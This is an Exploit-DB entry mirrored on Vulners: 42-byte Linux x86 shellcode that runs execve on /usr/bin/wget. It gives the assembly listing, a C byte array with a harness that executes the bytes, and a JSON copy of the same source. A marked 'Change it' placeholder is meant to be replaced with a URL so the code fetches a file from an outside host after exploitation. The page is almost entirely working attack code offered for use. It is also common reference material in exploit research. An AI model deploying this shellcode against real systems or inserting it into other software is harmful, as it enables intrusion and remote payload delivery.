Search...

Linux x86 execve"/usr/bin/wget", "aaaa"; 42 bytes

2010-05-17T00:00:00

ID EDB-ID:13702
Type exploitdb
Reporter Jonathan Salwan
Modified 2010-05-17T00:00:00

Description

Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes. Shellcode exploit for linux platform

                                        
                                            /*
Title: 	 Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes
Author:	 Jonathan Salwan &lt;submit AT shell-storm.org&gt;
Web:	 http://www.shell-storm.org
Twitter: http://twitter.com/jonathansalwan	


!Database of Shellcodes http://www.shell-storm.org/shellcode/


08048054 &lt;.text&gt;:
 8048054:	6a 0b                	push   $0xb
 8048056:	58                   	pop    %eax
 8048057:	99                   	cltd   
 8048058:	52                   	push   %edx
 8048059:	68 61 61 61 61       	push   $0x61616161
 804805e:	89 e1                	mov    %esp,%ecx
 8048060:	52                   	push   %edx
 8048061:	6a 74                	push   $0x74
 8048063:	68 2f 77 67 65       	push   $0x6567772f
 8048068:	68 2f 62 69 6e       	push   $0x6e69622f
 804806d:	68 2f 75 73 72       	push   $0x7273752f
 8048072:	89 e3                	mov    %esp,%ebx
 8048074:	52                   	push   %edx
 8048075:	51                   	push   %ecx
 8048076:	53                   	push   %ebx
 8048077:	89 e1                	mov    %esp,%ecx
 8048079:	cd 80                	int    $0x80
 804807b:	40                   	inc    %eax
 804807c:	cd 80                	int    $0x80
*/

#include &lt;stdio.h&gt;

char sc[] = 	"\x6a\x0b\x58\x99\x52"
		"\x68\x61\x61\x61\x61" // Change it
		"\x89\xe1\x52\x6a\x74"
		"\x68\x2f\x77\x67\x65"
		"\x68\x2f\x62\x69\x6e"
		"\x68\x2f\x75\x73\x72"
		"\x89\xe3\x52\x51\x53"
		"\x89\xe1\xcd\x80\x40"
		"\xcd\x80";

int main(void)
{
       	fprintf(stdout,"Length: %d\n",strlen(sc));
	(*(void(*)()) sc)();
     
return 0;
}

JSON Vulners Source

Initial Source

{"hash": "3fcce67e4c516734d5c17beb9f85c472bc2dea6c69f9347c33e1a605bff7e21f", "id": "EDB-ID:13702", "lastseen": "2016-02-01T18:19:02", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/13702/", "description": "Linux x86 execve(\"/usr/bin/wget\", \"aaaa\"); - 42 bytes. Shellcode exploit for linux platform", "title": "Linux x86 execve\"/usr/bin/wget\", \"aaaa\"; 42 bytes", "sourceData": "/*\r\nTitle: \t Linux x86 execve(\"/usr/bin/wget\", \"aaaa\"); - 42 bytes\r\nAuthor:\t Jonathan Salwan <submit AT shell-storm.org>\r\nWeb:\t http://www.shell-storm.org\r\nTwitter: http://twitter.com/jonathansalwan\t\r\n\r\n\r\n!Database of Shellcodes http://www.shell-storm.org/shellcode/\r\n\r\n\r\n08048054 <.text>:\r\n 8048054:\t6a 0b \tpush $0xb\r\n 8048056:\t58 \tpop %eax\r\n 8048057:\t99 \tcltd \r\n 8048058:\t52 \tpush %edx\r\n 8048059:\t68 61 61 61 61 \tpush $0x61616161\r\n 804805e:\t89 e1 \tmov %esp,%ecx\r\n 8048060:\t52 \tpush %edx\r\n 8048061:\t6a 74 \tpush $0x74\r\n 8048063:\t68 2f 77 67 65 \tpush $0x6567772f\r\n 8048068:\t68 2f 62 69 6e \tpush $0x6e69622f\r\n 804806d:\t68 2f 75 73 72 \tpush $0x7273752f\r\n 8048072:\t89 e3 \tmov %esp,%ebx\r\n 8048074:\t52 \tpush %edx\r\n 8048075:\t51 \tpush %ecx\r\n 8048076:\t53 \tpush %ebx\r\n 8048077:\t89 e1 \tmov %esp,%ecx\r\n 8048079:\tcd 80 \tint $0x80\r\n 804807b:\t40 \tinc %eax\r\n 804807c:\tcd 80 \tint $0x80\r\n*/\r\n\r\n#include <stdio.h>\r\n\r\nchar sc[] = \t\"\\x6a\\x0b\\x58\\x99\\x52\"\r\n\t\t\"\\x68\\x61\\x61\\x61\\x61\" // Change it\r\n\t\t\"\\x89\\xe1\\x52\\x6a\\x74\"\r\n\t\t\"\\x68\\x2f\\x77\\x67\\x65\"\r\n\t\t\"\\x68\\x2f\\x62\\x69\\x6e\"\r\n\t\t\"\\x68\\x2f\\x75\\x73\\x72\"\r\n\t\t\"\\x89\\xe3\\x52\\x51\\x53\"\r\n\t\t\"\\x89\\xe1\\xcd\\x80\\x40\"\r\n\t\t\"\\xcd\\x80\";\r\n\r\nint main(void)\r\n{\r\n \tfprintf(stdout,\"Length: %d\\n\",strlen(sc));\r\n\t(*(void(*)()) sc)();\r\n \r\nreturn 0;\r\n}\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2010-05-17T00:00:00", "osvdbidlist": [], "references": [], "reporter": "Jonathan Salwan", "modified": "2010-05-17T00:00:00", "href": "https://www.exploit-db.com/exploits/13702/"}